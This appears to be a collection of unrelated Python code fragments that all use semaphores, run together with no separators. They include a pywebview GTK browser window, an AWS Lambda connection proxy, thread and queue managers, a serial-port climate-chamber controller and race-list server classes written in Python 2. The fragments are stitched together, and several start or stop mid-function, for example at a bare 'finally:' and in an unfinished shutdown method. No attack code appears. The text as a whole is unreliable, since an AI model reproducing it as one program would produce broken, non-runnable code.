class BrowserView: instance = None class JSBridge: def __init__(self, api_instance): self.api = api_instance self.uid = uuid1().hex[:8] def call(self, func_name, param): if param == 'undefined': param = None return _js_bridge_call(self.api, func_name, param) def __init__(self, title, url, width, height, resizable, fullscreen, min_size, confirm_quit, background_color, debug, js_api, webview_ready): BrowserView.instance = self self.webview_ready = webview_ready self.is_fullscreen = False self._js_result_semaphore = Semaphore(0) self.load_event = Event() self.js_bridge = None glib.threads_init() window = gtk.Window(title=title) if resizable: window.set_size_request(min_size[0], min_size[1]) window.resize(width, height) else: window.set_size_request(width, height) window.set_resizable(resizable) window.set_position(gtk.WindowPosition.CENTER) # Set window background color style_provider = gtk.CssProvider() style_provider.load_from_data( 'GtkWindow {{ background-color: {}; }}'.format( background_color).encode()) gtk.StyleContext.add_provider_for_screen( Gdk.Screen.get_default(), style_provider, gtk.STYLE_PROVIDER_PRIORITY_APPLICATION) scrolled_window = gtk.ScrolledWindow() window.add(scrolled_window) self.window = window if confirm_quit: self.window.connect('delete-event', self.on_destroy) else: self.window.connect('delete-event', self.close_window) if js_api: self.js_bridge = BrowserView.JSBridge(js_api) self.webview = webkit.WebView() self.webview.connect('notify::visible', self.on_webview_ready) self.webview.connect('document-load-finished', self.on_load_finish) self.webview.connect('status-bar-text-changed', self.on_status_change) self.webview.props.settings.props.enable_default_context_menu = False self.webview.props.opacity = 0.0 scrolled_window.add(self.webview) window.show_all() if url is not None: self.webview.load_uri(url) if fullscreen: self.toggle_fullscreen() def close_window(self, *data): while gtk.events_pending(): gtk.main_iteration() self.window.destroy() gtk.main_quit() self._js_result_semaphore.release() def on_destroy(self, widget=None, *data): dialog = gtk.MessageDialog( parent=self.window, flags=gtk.DialogFlags.MODAL & gtk.DialogFlags.DESTROY_WITH_PARENT, type=gtk.MessageType.QUESTION, buttons=gtk.ButtonsType.OK_CANCEL, message_format=localization['global.quitConfirmation']) result = dialog.run() if result == gtk.ResponseType.OK: self.close_window() else: dialog.destroy() return True def on_webview_ready(self, arg1, arg2): glib.idle_add(self.webview_ready.set) def on_load_finish(self, webview, webframe): # Show the webview if it's not already visible if not webview.props.opacity: glib.idle_add(webview.set_opacity, 1.0) if self.js_bridge: self._set_js_api() else: self.load_event.set() def on_status_change(self, webview, status): try: delim = '_' + self.js_bridge.uid + '_' except AttributeError: return # Check if status was updated by a JSBridge call if status.startswith(delim): _, func_name, param = status.split(delim) return_val = self.js_bridge.call(func_name, param) # Give back the return value to JS as a string code = 'pywebview._bridge.return_val = "{0}";'.format( _escape_string(str(return_val))) webview.execute_script(code) def show(self): gtk.main() def destroy(self): self.window.emit('delete-event', Gdk.Event()) def toggle_fullscreen(self): if self.is_fullscreen: self.window.unfullscreen() else: self.window.fullscreen() self.is_fullscreen = not self.is_fullscreen def create_file_dialog(self, dialog_type, directory, allow_multiple, save_filename, file_types): if dialog_type == FOLDER_DIALOG: gtk_dialog_type = gtk.FileChooserAction.SELECT_FOLDER title = localization["linux.openFolder"] button = gtk.STOCK_OPEN elif dialog_type == OPEN_DIALOG: gtk_dialog_type = gtk.FileChooserAction.OPEN if allow_multiple: title = localization['linux.openFiles'] else: title = localization['linux.openFile'] button = gtk.STOCK_OPEN elif dialog_type == SAVE_DIALOG: gtk_dialog_type = gtk.FileChooserAction.SAVE title = localization['global.saveFile'] button = gtk.STOCK_SAVE dialog = gtk.FileChooserDialog( title, self.window, gtk_dialog_type, (gtk.STOCK_CANCEL, gtk.ResponseType.CANCEL, button, gtk.ResponseType.OK)) dialog.set_select_multiple(allow_multiple) dialog.set_current_folder(directory) self._add_file_filters(dialog, file_types) if dialog_type == SAVE_DIALOG: dialog.set_current_name(save_filename) response = dialog.run() if response == gtk.ResponseType.OK: file_name = dialog.get_filenames() else: file_name = None dialog.destroy() return file_name def _add_file_filters(self, dialog, file_types): for s in file_types: description, extensions = _parse_file_type(s) f = gtk.FileFilter() f.set_name(description) for e in extensions.split(';'): f.add_pattern(e) dialog.add_filter(f) def get_current_url(self): uri = self.webview.get_uri() return uri def load_url(self, url): self.load_event.clear() self.webview.load_uri(url) def load_html(self, content, base_uri): self.load_event.clear() self.webview.load_string(content, 'text/html', 'utf-8', base_uri) def evaluate_js(self, script): def _evaluate_js(): self.webview.execute_script(code) self._js_result_semaphore.release() unique_id = uuid1().hex # Backup the doc title and store the result in it with a custom prefix code = 'oldTitle{0} = document.title; document.title = eval("{1}");'.format( unique_id, _escape_string(script)) self.load_event.wait() glib.idle_add(_evaluate_js) self._js_result_semaphore.acquire() if not gtk.main_level(): # Webview has been closed, don't proceed return None # Restore document title and return _js_result = self._parse_js_result(self.webview.get_title()) code = 'document.title = oldTitle{0};'.format(unique_id) glib.idle_add(self.webview.execute_script, code) return _js_result def _parse_js_result(self, result): try: return int(result) except ValueError: try: return float(result) except ValueError: return result def _set_js_api(self): def create_bridge(): # Make the `call` method write the function name and param to the # `status` attribute of the JS window, delimited by a unique token. # The return value will be passed back to the `return_val` attribute # of the bridge by the on_status_change handler. code = """ window.pywebview._bridge.call = function(funcName, param) {{ window.status = "_{0}_" + funcName + "_{0}_" + param; return this.return_val; }};""".format(self.js_bridge.uid) # Create the `pywebview` JS api object self.webview.execute_script(_parse_api_js(self.js_bridge.api)) self.webview.execute_script(code) self.load_event.set() glib.idle_add(create_bridge)
tpool = [] while fp.hasNext(): fe = fp.next() benchmarkRun = benchmark if args.outputFile != None: benchmarkRun = benchmark.replace(args.outputFile, outputFolder + args.outputFile+"_"+fe.label+".txt") print "\n\nRunning " + benchmarkRun +\ " with fault:\n" + str(fe) if args.multiThread: sem.acquire() t = Thread(target = StartRegFaultSim, args = (statFolder, benchmarkRun, fe)) tpool.append(t) t.start() else: StartRegFaultSim(statFolder, benchmarkRun, fe) if args.multiThread: for t in tpool: t.join()
class StreamLambdaProxy(AbstractStreamProxy): """Invoke a lambda for each connection""" class Connection(AbstractStreamProxy.Connection): def __init__(self, host, port): self.host = host self.port = port def close(self): pass def __str__(self): return self.host + ':' + self.port def __init__(self, functions, maxParallelRequests, pubKeyFile, streamServer, stats, maxIdleTimeout=1): self.__connIdleTimeout = maxIdleTimeout self.__functions = functions self.__functionToClient = {} self.__regionToClient = {} self.__lambdaRateSemaphore = Semaphore(maxParallelRequests) self.__lambda = boto3.client('lambda') if 'lambda' not in stats.models: stats.register_model('lambda', LambdaStatsModel()) self.__lambdaStats = stats.get_model('lambda') self.__streamServer = streamServer # Enable encryption self.__enableEncryption = False if pubKeyFile is not None: with open(pubKeyFile, 'rb') as ifs: self.__rsaCipher = PKCS1_OAEP.new(RSA.importKey(ifs.read())) self.__enableEncryption = True def __get_lambda_client(self, function): """Get a lambda client from the right region""" client = self.__functionToClient.get(function) if client is not None: return client if 'arn:' not in function: # using function name in the default region client = self.__lambda self.__functionToClient[function] = client else: region = _get_region_from_arn(function) client = self.__regionToClient.get(region) if client is None: client = boto3.client('lambda', region_name=region) self.__regionToClient[region] = client self.__functionToClient[function] = client return client def connect(self, host, port): return StreamLambdaProxy.Connection(host, port) def stream(self, cliSock, servInfo): assert isinstance(servInfo, StreamLambdaProxy.Connection) socketId = '%016x' % random.getrandbits(128) invokeArgs = { 'stream': True, 'socketId': socketId, 'streamServer': self.__streamServer.publicHostAndPort, 'host': servInfo.host, 'port': int(servInfo.port), 'idleTimeout': self.__connIdleTimeout } function = random.choice(self.__functions) lambdaClient = self.__get_lambda_client(function) self.__lambdaRateSemaphore.acquire() try: self.__streamServer.take_ownership_of_socket( socketId, cliSock, self.__connIdleTimeout) with self.__lambdaStats.record() as billingObject: invokeResponse = lambdaClient.invoke( FunctionName=function, Payload=json.dumps(invokeArgs), LogType='Tail') billingObject.parse_log(invokeResponse['LogResult']) finally: self.__lambdaRateSemaphore.release() if invokeResponse['StatusCode'] != 200: logger.error('%s: status=%d', invokeResponse['FunctionError'], invokeResponse['StatusCode']) if 'FunctionError' in invokeResponse: logger.error('%s error: %s', invokeResponse['FunctionError'], invokeResponse['Payload'].read())
def worker(sem: Semaphore): global count sem.acquire() count += 1 sem.release()
class ThreadManager: def __init__(self, alpha, start_cond, start_point, args=(), kwargs=None, time_sleep=1): self.semaphore = Semaphore(value=alpha) self.start_cond = start_cond self.args = args self.kwargs = kwargs if kwargs is not None else {} self._cont = 0 self._semcont = Semaphore() self.time_sleep = time_sleep def locked_start(*largs, **lkwargs): self.semaphore.acquire() start_point(*largs, **lkwargs) self._semcont.acquire() self._cont -= 1 self._semcont.release() self.semaphore.release() self.start_point = locked_start def start(self): while True: value = self.start_cond() debug( f'ThreadManager.start - Result of start condition is: {value}') if value: debug(f'ThreadManager.start - Acquire General Semaphore') self.semaphore.acquire() debug(f'ThreadManager.start - Try to create Thread') t = Thread(target=self.start_point, args=self.args, kwargs=self.kwargs) debug(f'ThreadManager.start - Acquire Secondary Semaphore') self._semcont.acquire() self._cont += 1 debug( f'ThreadManager.start - Add one to counter of threads. _cont = {self._cont}' ) debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug(f'ThreadManager.start - Start thread') t.start() debug(f'ThreadManager.start - Release General Semaphore') self.semaphore.release() else: self._semcont.acquire() debug(f'ThreadManager.start - Acquire Secondary Semaphore') if self._cont == 0: debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug(f'ThreadManager.start - Finish manager') return debug(f'ThreadManager.start - Release Secondary Semaphore') self._semcont.release() debug( f'ThreadManager.start - Sleeping {self.time_sleep} seconds and try again' ) sleep(self.time_sleep)
#define __DOC4(n1, n2, n3, n4) __doc_##n1##_##n2##_##n3##_##n4 #define __DOC5(n1, n2, n3, n4, n5) __doc_##n1##_##n2##_##n3##_##n4##_##n5 #define __DOC6(n1, n2, n3, n4, n5, n6) __doc_##n1##_##n2##_##n3##_##n4##_##n5##_##n6 #define __DOC7(n1, n2, n3, n4, n5, n6, n7) __doc_##n1##_##n2##_##n3##_##n4##_##n5##_##n6##_##n7 #define DOC(...) __EXPAND(__EXPAND(__CAT2(__DOC, __VA_SIZE(__VA_ARGS__)))(__VA_ARGS__)) #if defined(__GNUG__) #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-variable" #endif ''') output = [] for filename in filenames: thr = ExtractionThread(filename, parameters, output) thr.start() print('Waiting for jobs to finish ..', file=sys.stderr) for i in range(job_count): job_semaphore.acquire() output.sort() for l in output: print(l) print(''' #if defined(__GNUG__) #pragma GCC diagnostic pop #endif ''')
class DataGenerator(object): def __init__( self, data, process_data_item_func, xshape, yshape, \ data_item_selector = choice, \ nthreads = 2, \ pool_size = 1000, \ min_nsamples = 1, \ dtype = 'single' ): assert pool_size >= min_nsamples, \ 'Min. samples must be equal or less than pool_size' assert min_nsamples > 0 and pool_size > 0, \ 'Min. samples and pool size must be positive non-zero numbers' self._data = data self._process_data_item = process_data_item_func self._data_item_selector = data_item_selector #随即选择 self._xshape = xshape self._yshape = yshape self._nthreads = nthreads self._pool_size = pool_size self._min_nsamples = min_nsamples self._dtype = dtype self._count = 0 self._stop = False self._threads = [] self._sem = Semaphore() self._X, self._Y = self._get_buffers(self._pool_size) def _get_buffers(self,N): X = np.empty((N,) + self._xshape, dtype=self._dtype) Y = np.empty((N,) + self._yshape, dtype=self._dtype) return X,Y def _compute_sample(self): d = self._data_item_selector(self._data) return self._process_data_item(d) def _insert_data(self,x,y): self._sem.acquire() if self._count < self._pool_size: self._X[self._count] = x self._Y[self._count] = y self._count += 1 else: idx = randint(0,self._pool_size-1) self._X[idx] = x self._Y[idx] = y self._sem.release() def _run(self): while True: x,y = self._compute_sample() self._insert_data(x,y) if self._stop: break def stop(self): self._stop = True for thread in self._threads: thread.join() def start(self): self._stop = False self._threads = [Thread(target=self._run) for n in range(self._nthreads)] for thread in self._threads: thread.setDaemon(True) thread.start() def get_batch(self,N): # Wait until the buffer was filled with the minimum # number of samples while self._count < self._min_nsamples: sleep(.1) X,Y = self._get_buffers(N) self._sem.acquire() for i in range(N): idx = randint(0,self._count-1) X[i] = self._X[idx] Y[i] = self._Y[idx] self._sem.release() return X,Y
class RLServerList(StopableThread): # {{{ def __init__(self,racelistserver): StopableThread.__init__(self,config.server_update) self._racelistserver = racelistserver # we keep ourself here self._rls = RLServer({ "protocol_version":request.PROTOCOL_VERSION, "rls_id":sha.new("%s%s%s" % (SERVER_VERSION,config.servername,config.racelistport)).hexdigest(), "name":config.servername, "port":str(config.racelistport), "maxload":str(config.server_maxload), "ip":socket.gethostbyname(config.servername) }) self._servers = {} self._servers_sem = Semaphore(verbose=1) if __debug__: log(Log.DEBUG, "_servers_sem = %s" % self._servers_sem ) self._load() self.client = None def hasRLServer(self, rls_id): return self._rls.params['rls_id']==rls_id or self._servers.has_key(rls_id) def getRLServer(self, rls_id): self._servers_sem.acquire() try: if not self.hasRLServer(rls_id): raise Error(Error.AUTHERROR, "race list server unknown/not logged in") return self._servers[rls_id] finally: self._servers_sem.release() def addRLServer(self,rls): rls_id = rls.params['rls_id'] self._servers_sem.acquire() try: # this also blocks ourself from beeing added; see hasRLServer if not self.hasRLServer(rls_id): self._servers[rls_id] = rls finally: self._servers_sem.release() self._buildServerListReply() def delRLServer(self,rls_id,ip): # check for unknown server if not self.hasRLServer(rls_id): return # check for the same ip, as the server has registered rls = self.getRLServer(rls_id) if not ip==rls.params['ip']: return # delete the server from the list self._servers_sem.acquire() try: del self._servers[rls_id] finally: self._servers_sem.release() self._buildServerListReply() def getUpdate(self, ip, rls_id, current_load): self._servers_sem.acquire() try: if self._servers.has_key(rls_id): rls = self._servers[rls_id] # update the ip of the racelist server, if it has changed if rls.params['ip'] != ip: rls.params['ip'] = ip ret = rls.getUpdate(current_load) else: raise Error(Error.AUTHERROR, 'unknown server') finally: self._servers_sem.release() # with the update comes also the current load so we rebuild the lists self._buildServerListReply() return ret def addRequest(self, values): self._servers_sem.acquire() try: for server in self._servers.values(): server.addRequest(values) finally: self._servers_sem.release() def _load(self): filename = config.file_serverlist log(Log.INFO, "load the server list from file '%s'" % (filename)) try: try: f = open(filename, "r") self._servers = cPickle.load(f) finally: try: f.close() except: pass except Exception, e: log(Log.WARNING, "failed to load server list from file '%s': %s" % (filename, e)) self._buildServerListReply()
def exec_proc(args: Union[str, Iterable[str]], on_stdout: Callable[[bytes], None] = None, on_stderr: Callable[[bytes], None] = None, stderr_to_stdout: bool = False, buffer_size: int = 16 * 1024, ctrl_c_timeout: float = 3, **kwargs) -> Generator[subprocess.Popen, None, None]: """ Execute an external program within a context. Args: args: Command line or arguments of the program. If it is a command line, then `shell = True` will be set. on_stdout: Callback for capturing stdout. on_stderr: Callback for capturing stderr. stderr_to_stdout: Whether or not to redirect stderr to stdout? If specified, `on_stderr` will be ignored. buffer_size: Size of buffers for reading from stdout and stderr. ctrl_c_timeout: Seconds to wait for the program to respond to CTRL+C signal. \\**kwargs: Other named arguments passed to :func:`subprocess.Popen`. Yields: The process object. """ # check the arguments if stderr_to_stdout: kwargs['stderr'] = subprocess.STDOUT on_stderr = None if on_stdout is not None: kwargs['stdout'] = subprocess.PIPE if on_stderr is not None: kwargs['stderr'] = subprocess.PIPE # output reader def reader_func(fd, action): while not stopped[0]: buf = os.read(fd, buffer_size) if not buf: break action(buf) def make_reader_thread(fd, action): try: th = Thread(target=reader_func, args=(fd, action)) th.daemon = True th.start() return th finally: reader_sem.release() reader_sem = Semaphore() expected_sem_target = int(on_stdout is not None) + int( on_stderr is not None) # internal flags stopped = [False] # launch the process stdout_thread = None # type: Thread stderr_thread = None # type: Thread if isinstance(args, (str, bytes)): shell = True else: args = tuple(args) shell = False if sys.platform != 'win32': kwargs.setdefault('preexec_fn', os.setsid) proc = subprocess.Popen(args, shell=shell, **kwargs) # patch the kill() to ensure the whole process group would be killed, # in case `shell = True`. def my_kill(self, ctrl_c_timeout=ctrl_c_timeout): recursive_kill(self, ctrl_c_timeout=ctrl_c_timeout) proc.kill = types.MethodType(my_kill, proc) try: if on_stdout is not None: stdout_thread = make_reader_thread(proc.stdout.fileno(), on_stdout) if on_stderr is not None: stderr_thread = make_reader_thread(proc.stderr.fileno(), on_stderr) for i in range(expected_sem_target): reader_sem.acquire() try: yield proc except KeyboardInterrupt: # pragma: no cover if proc.poll() is None: # Wait for a while to ensure the program has properly dealt # with the interruption signal. This will help to capture # the final output of the program. # TODO: use signal.signal instead for better treatment _ = timed_wait_proc(proc, 1) finally: if proc.poll() is None: proc.kill() # gracefully stop the reader without setting `stopped = True` for # a couple of time, so as to ensure the remaining content are read out. for th in (stdout_thread, stderr_thread): if th is not None: try: th.join(3000) except TimeoutError: pass # Force setting the stopped flag, and wait for the reader threads to exit. stopped[0] = True for th in (stdout_thread, stderr_thread): if th is not None: th.join() # Ensure all the pipes are closed. for f in (proc.stdout, proc.stderr, proc.stdin): if f is not None: try: f.close() except Exception: # pragma: no cover getLogger(__name__).info( 'Failed to close a sub-process pipe.', exc_info=True)
class KTHS_415BS: def __init__(self, serial_port: str): logging.basicConfig(level=logging.DEBUG) self.port = serial.Serial(serial_port, baudrate=19200, parity=serial.PARITY_NONE, timeout=1) self.status_dict = {'0': "STOPPED", '1': "RUNNING", '2': "RESERVED"} self.pgm_list = list() self.pv = dict() self.sem = Semaphore() self.power_status = self.check_power_status() def check_power_status(self): self.sem.acquire() self.port.write('STX,0,1,A,END'.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() if len(re) <= 10: return False return True def get_status(self): self.sem.acquire() self.port.write('STX,0,1,A,END'.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("check status return:\n{}".format(re)) re = re.split(",")[4:-1] self.pv['type'], self.pv['status'], self.pv['temperature'], self.pv[ 'humidity'], self.pv['temp_sv'], self.pv['humi_sv'] = re[0:6] self.pv['pgm_name'], self.pv['cycle'], self.pv['step'], self.pv[ 'hour'], self.pv['min'], self.pv['error'] = re[6:] self.pv['status'] = self.status_dict[self.pv['status']] logging.debug("Current Running Status:{}\n".format(self.pv['status'])) logging.debug("Current Error Status:{}\n".format(self.pv['error'])) return True def delete_pgm(self, pgm_name: str): self.sem.acquire() self.port.write('STX,0,1,D,{},END'.format(pgm_name).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("delete program return:\n{}".format(re)) return re == 'STX,1,0,D,END' def stop(self): self.sem.acquire() self.port.write('STX,0,1,E,END'.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("stop return:\n{}".format(re)) return re == 'STX,1,0,E,END' def pgm_jump_section(self, section): self.sem.acquire() self.port.write('STX,0,1,J,{},END'.format(section).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Jump section {} return:\n{}".format(section, re)) return re == 'STX,1,0,J,END' def pgm_jump_next(self): """pgm_jump_next() funtion will jump by the next step, which means machine will jump from N to N+2 step and bypass N+1 step""" return self.pgm_jump_section('N') def list_all_pgm(self): self.sem.acquire() self.port.write('STX,0,1,O,END'.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Get all pgm return:\n{}".format(re)) pgm_count = int(re.split(',')[4]) if pgm_count >= 1: logging.debug("PGM count:{}".format(pgm_count)) self.pgm_list = re.split(',')[5:-1] return self.pgm_list else: logging.debug("PGM count zero!") return None def load_pgm(self, pgm_name: str): self.get_status() if self.pv['status'] == 'STOPPED': self.sem.acquire() self.port.write('STX,0,1,L,{},END'.format(pgm_name).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Load program {} return:\n{}".format(pgm_name, re)) return re == 'STX,1,0,L,END' else: return False def rename_pgm(self, src_pgm: str, dst_pgm: str): self.sem.acquire() self.port.write('STX,0,1,N,{},{},END'.format(src_pgm, dst_pgm).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Rename program {} to {} return:\n{}".format( src_pgm, dst_pgm, re)) return re == 'STX,1,0,N,END' def view_pgm(self, pgm_name: str): self.sem.acquire() self.port.write('STX,0,1,R,{},END'.format(pgm_name).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("View program {} return:\n{}".format(pgm_name, re)) re = re.split(',')[5:-1] pgm_content = dict() pgm_content['cycle'], pgm_content['step'], pgm_content[ 'high_limit'], pgm_content['low_limit'] = re[:4] steps = re[4:] # chunk the steps in to sections by size 8 pgm_content['steps'] = [ steps[x * 8:(x + 1) * 8] for x in range(0, int(pgm_content['step'])) ] return pgm_content def run_loaded_pgm(self): self.get_status() if self.pv['status'] == 'STOPPED': self.sem.acquire() self.port.write('STX,0,1,T,END'.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Run loaded program return:\n{}".format(re)) return re == 'STX,1,0,T,END' else: logging.warning( "Can only run loaded program when machine status is stopped!") return False def execute_pgm(self, pgm_name: str): self.get_status() if self.pv['status'] == 'STOPPED': self.sem.acquire() self.port.write('STX,0,1,S,{},END'.format(pgm_name).encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Execute program return:\n{}".format(re)) return re == 'STX,1,0,S,END' else: logging.warning( "Can only execute program when machine status is stopped!") return False def write_pgm(self, pgm_name: str, target_temp: int, target_humi: int, target_hour: int, target_min: int): """due to function parameter complication,this function only support 1 target temperature and 1 target humidity in 2 steps,low limit and high limit setting not working,automatic set according to your temp setting,so we add two steps with 150 and -50C to set the limit range to -50~150""" cmd_str = 'STX,0,1,W,{pgm_name},1,4,{high_limit},{low_limit},{target_temp},' \ '{target_humi},0,0,0,0,0,0,{target_temp},{target_humi},{target_hour},' \ '{target_min},0,0,0,0,' \ '150,0,0,1,0,0,0,0,-50,0,0,1,0,0,0,0,END'.format(pgm_name=pgm_name, target_temp=target_temp, high_limit=100, low_limit=0, target_humi=target_humi, target_hour=target_hour, target_min=target_min) self.sem.acquire() self.port.write(cmd_str.encode()) re = self.port.read_until('END').decode().replace(" ", "") self.sem.release() logging.debug("Write Program return:\n{}".format(re)) return re == "STX,1,0,W,END" def close(self): self.port.close()
class RaceList(StopableThread): # {{{ STATE_START = 1 STATE_RUN = 2 STATE_STOP = 3 def __init__(self, racelistserver): StopableThread.__init__(self,config.racelist_clean_interval) self._racelistserver = racelistserver self._users = {} self._usersuniqids = {} self._races = {} self._racesbroadcasts = {} self._reqfull = [] self._state = RaceList.STATE_START self._users_sem = Semaphore(verbose=1) self._races_sem = Semaphore(verbose=1) if __debug__: log(Log.DEBUG, "_users_sem = %s" % self._users_sem ) log(Log.DEBUG, "_races_sem = %s" % self._races_sem ) self._load() def hasUser(self, client_id): return self._users.has_key(client_id) def hasRace(self, server_id): return self._races.has_key(server_id) def addUser(self,user): self._users_sem.acquire() try: client_id = user.params['client_id'] if not self.hasUser(client_id): self._users[client_id] = user self._usersuniqids[user.params['client_uniqid']] = user else: raise Error(Error.REQUESTERROR, "user already registered") finally: self._users_sem.release() def removeUser(self,client_id): self._users_sem.acquire() self._races_sem.acquire() try: self._removeUser(client_id) finally: self._races_sem.release() self._users_sem.release() def _removeUser(self,client_id): if self.hasUser(client_id): if self._usersuniqids.has_key(self._users[client_id].params['client_uniqid']): del self._usersuniqids[self._users[client_id].params['client_uniqid']] del self._users[client_id] for race in self._races.values(): race.removeDriver(client_id) self._buildRaceListAsReply() def getUser(self,client_id): self._users_sem.acquire() try: if not self.hasUser(client_id): raise Error(Error.AUTHERROR, "user unknown/not logged in") ret = self._users[client_id] ret.setActive() return ret finally: self._users_sem.release() def getUserByUniqId(self,client_uniqid): if self._usersuniqids.has_key(client_uniqid): return self._usersuniqids[client_uniqid] return None def addRace(self,race): self._races_sem.acquire() try: if not self.hasRace(race.params['server_id']): self._races[race.params['server_id']] = race self._racesbroadcasts[race.params['broadcastid']] = race self._buildRaceListAsReply() finally: self._races_sem.release() def removeRace(self,server_id,client_id): self._races_sem.acquire() try: self._removeRace(server_id, client_id) finally: self._races_sem.release() def _removeRace(self,server_id,client_id): if not self.hasRace(server_id): return if self._races[server_id].params['client_id']!=client_id: raise Error(Error.AUTHERROR, "authorization required") broadcastid = self._races[server_id].params['broadcastid'] if self._racesbroadcasts.has_key(broadcastid): del self._racesbroadcasts[broadcastid] del self._races[server_id] self._buildRaceListAsReply() def driverJoinRace(self,server_id,driver): self._races_sem.acquire() try: for race in self._races.values(): race.removeDriver(driver.params['client_id']) if self.hasRace(server_id): self._races[server_id].addDriver(driver) self._buildRaceListAsReply() finally: self._races_sem.release() def driverLeaveRace(self,server_id,client_id): self._races_sem.acquire() try: if self.hasRace(server_id): self._races[server_id].removeDriver(client_id) self._buildRaceListAsReply() finally: self._races_sem.release() def _buildRaceListAsReply(self): self.reqfull = [] for race in self._races.values(): if race.params['visible']: self.reqfull.append(race.getRaceAsReply()) for driver in race.drivers.values(): self.reqfull.append(driver.getDriverAsReply()) def getRaceListAsReply(self): self._races_sem.acquire() try: return self.reqfull finally: self._races_sem.release() def updateRaceViaBroadcast(self, params): self._users_sem.acquire() self._races_sem.acquire() try: broadcastid = "%s:%s" % (params['ip'], params['joinport']) race = None if not self._racesbroadcasts.has_key(broadcastid): for r in self._races.values(): if r.params['broadcastname'] == params['name']: # we found by name - update the ip and broadcast race = r old_broadcast_id = race.params['broadcastid'] del self._racesbroadcasts[old_broadcast_id] race.params['ip'] = params['ip'] race.genBroadcastId() self._racesbroadcasts[race.params['broadcastid']] = race else: race = self._racesbroadcasts[broadcastid] if race is not None: race = self._racesbroadcasts[broadcastid] race.updateRaceViaBroadcast( params['players'], params['maxplayers'], params['racetype'], params['trackdir'], params['sessiontype'], params['sessionleft'] ) self._buildRaceListAsReply() # set the starting user active so it gets # distributed for sure and assures, that a # race can be started on the other racelists client_id = race.params['client_id'] if self._users.has_key(client_id): self._users[client_id].setActive() finally: self._races_sem.release() self._users_sem.release() def _run(self): """lurks behind the scenes and cleans the._races and the._users""" # nothing do until we hit the RUN state if self._state!=RaceList.STATE_RUN: return currenttime = time() usercount = 0 userdelcount = 0 racecount = 0 racedelcount = 0 raceinvisiblecount = 0 self._users_sem.acquire() self._races_sem.acquire() try: for server_id in self._races.keys(): racecount = racecount + 1 # set the client, which started the race, active client_id = self._races[server_id].params['client_id'] if self._users.has_key(client_id): self._users[client_id].setActive() if self._racelistserver._request_count: if self._races[server_id].params['visible'] and self._races[server_id].checkTimeout(currenttime): # soft timeout removes it from display if __debug__: log(Log.DEBUG, "setting race %s invisible" % server_id ) self._races[server_id].params['visible'] = 0 raceinvisiblecount = raceinvisiblecount + 1 self._buildRaceListAsReply() elif self._races[server_id].checkTimeout(currenttime,config.race_timeout_hard): # hard timeout deletes the race if __debug__: log(Log.DEBUG, "removing race %s" % server_id ) racedelcount = racedelcount + 1 self._removeRace(server_id, self._races[server_id].params['client_id']) for client_id in self._users.keys(): usercount = usercount + 1 if self._users[client_id].checkTimeout(currenttime): if __debug__: log(Log.DEBUG, "removing user %s" % client_id ) userdelcount = userdelcount + 1 self._removeUser(client_id) finally: self._races_sem.release() self._users_sem.release() log(log.INFO, "cleanup: %d/%d users; %d/%d/%d races" % (userdelcount,usercount,racedelcount,raceinvisiblecount,racecount)) self._save() def _join(self): self._state = RaceList.STATE_STOP self._save() def _save(self): """stores the current racelist in the given file""" filename = config.file_racelist self._users_sem.acquire() self._races_sem.acquire() try: try: try: outf = open(filename, "w") cPickle.dump(self._users, outf ) cPickle.dump(self._races, outf ) finally: try: outf.close() except: log(Log.WARNING,"failed to close out file for racelist: %s" % (e) ) pass except Exception, e: log(Log.WARNING,"failed to save racelist state to file '%s': %s" % (filename,e) ) return finally: self._races_sem.release() self._users_sem.release() log(Log.INFO, "stored racelist to file '%s'" % filename ) def _load(self): """loads the racelist from the given file""" filename = config.file_racelist log(Log.INFO, "load racelist from file '%s'" % filename ) self._users_sem.acquire() self._races_sem.acquire() try: try: try: inf = open(filename, "r") self._users = cPickle.load(inf) self._races = cPickle.load(inf) self._racesbroadcasts = {} for race in self._races.values(): self._racesbroadcasts[race.params['broadcastid']] = race if self._users.has_key(race.params['client_id']): self._users[race.params['client_id']].setActive() # XXX update the racelist race.genBroadcastId() self._usersuniqids = {} for user in self._users.values(): self._usersuniqids[user.params['client_uniqid']] = user finally: try: inf.close() except: pass except Exception,e: log(Log.WARNING, "failed to load racelist state from file '%s': %s" % (filename, e) ) self._buildRaceListAsReply() finally:
class LooperQueue: """ The :class:`LooperQueue` provides an encapsulation of a queue, semaphore, and lock combination to be utilized and passed as one object. Makes it easy to share the queue, semaphore, and lock between the :class:`LooperPool` and the :class:`Looper` threaded objects. """ def __init__(self): self._queue = [] self._queue_available = Semaphore(value=0) self._queue_lock = RLock() self._queue_shutdown = None return def push_work(self, packet: object): """ Pushes a work packet for the :class:`LooperPool` threads to work on. """ available = 0 self._queue_lock.acquire() try: if self._queue_shutdown is not None: raise AKitLooperError( "The queue has been shutdown, no more work is allowed to be queued." ) from None self._queue.append(packet) self._queue_available.release() available = len(self._queue) finally: self._queue_lock.release() return available def push_work_packets(self, packets: list): """ Pushes a list of work packets for the :class:`LooperPool` threads to work on. """ available = 0 self._queue_lock.acquire() try: if self._queue_shutdown is not None: raise AKitLooperError( "The queue has been shutdown, no more work is allowed to be queued." ) from None self._queue.extend(packets) self._queue_available.release() available = len(self._queue) finally: self._queue_lock.release() return available def pop(self): """ Remove the next work packet from the :class:`LooperQueue` work queue. """ packet = None self._queue_available.acquire() self._queue_lock.acquire() try: if len(self._queue) > 0: packet = self._queue.pop(0) if self._queue_shutdown is not None: self._queue_shutdown.release() finally: self._queue_lock.release() return packet def shutdown_and_wait(self, notices): """ Starts the queue shutdown and waits for the last work time to be removed from the queue. """ self._queue_lock.acquire() try: for _ in range(0, notices): self._queue.append(LooperQueueShutdown()) wcount = (len(self._queue) - 1) * -1 self._queue_shutdown = Semaphore(value=wcount) 